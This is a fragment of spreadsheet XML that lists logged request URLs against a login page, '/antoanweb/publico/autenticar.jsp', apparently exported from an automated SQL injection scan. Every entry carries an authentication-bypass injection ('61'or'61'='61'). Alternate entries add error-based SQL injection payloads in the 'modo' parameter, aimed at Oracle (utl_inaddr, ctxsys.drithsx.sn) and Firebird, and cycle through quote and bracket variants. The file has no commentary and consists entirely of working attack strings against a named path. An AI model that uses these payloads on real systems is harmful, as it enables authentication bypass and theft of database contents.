    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1491")or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and("rpvq"="rpvq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8489</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5106"))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(("udec"="udec</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6484</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2280")))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((("iwrl"="iwrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4694</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2637"or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and"tmnh"="tmnh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7658</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5370")or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and("amop"like"amop</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1451</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4218"))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and(("vbcc"like"vbcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4159</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8915")))or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and((("tant"like"tant</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5827</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7137"or3342=utl_inaddr.get_host_address(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3342=3342)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58))and"gjji"like"gjji</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3454</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2231)or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-35</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5173')or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9577</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9279'or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7597</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4814"or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2159</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2174)or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(3391=3391</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4856</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9693))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((9009=9009</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2918</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5445)))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(((802=802</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2897</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-600or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-170')or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and('qnyn'='qnyn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6908</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-105'))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(('oecu'='oecu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2664</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8108')))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((('prwy'='prwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-613</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3981'or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and'zexl'='zexl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5319</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4391')or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and('sbzz'like'sbzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1619</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3094'))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(('zlru'like'zlru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2299</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7974')))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((('stop'like'stop</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-281</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1445'or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and'wviy'like'wviy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2782</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8706")or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and("tzuu"="tzuu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8688</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8402"))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(("kxps"="kxps</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5661</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7330")))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((("pxru"="pxru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4410</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5531"or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and"sjyu"="sjyu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-241</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5309")or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and("ulld"like"ulld</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2398</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-197"))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and(("whro"like"whro</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7577</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5625")))or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and((("qnys"like"qnys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3821</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-300"or5362=ctxsys.drithsx.sn(5362,(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(5362=5362)then1else0end)fromdual)||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)))and"rjgr"like"rjgr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5314</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7305)or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7491</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2161')or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5190</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2212'or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8160</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9474"or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4306</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6841)or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(7191=7191</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9398</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7478))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((6271=6271</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7606</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3409)))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(((7867=7867</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5445</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8356or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6091</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1614')or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and('udoz'='udoz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4322</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1855'))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(('mkpl'='mkpl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9355</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2480')))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((('zmhh'='zmhh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7774</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3098'or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and'yota'='yota</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4994</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-792')or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and('pkox'like'pkox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4145</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6940'))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(('yeei'like'yeei</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2878</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7353')))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((('zpxh'like'zpxh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3784</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9397'or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and'gvyp'like'gvyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3549</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4725")or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and("lzhu"="lzhu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7781</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1668"))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(("uzcu"="uzcu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-721</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6760")))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((("eloj"="eloj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7375</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-182"or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and"hedf"="hedf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-443</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9635")or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and("kbrv"like"kbrv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2447</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8424"))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and(("joml"like"joml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1919</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1817")))or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and((("iaza"like"iaza</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8038</t>
  </si>
  <si>
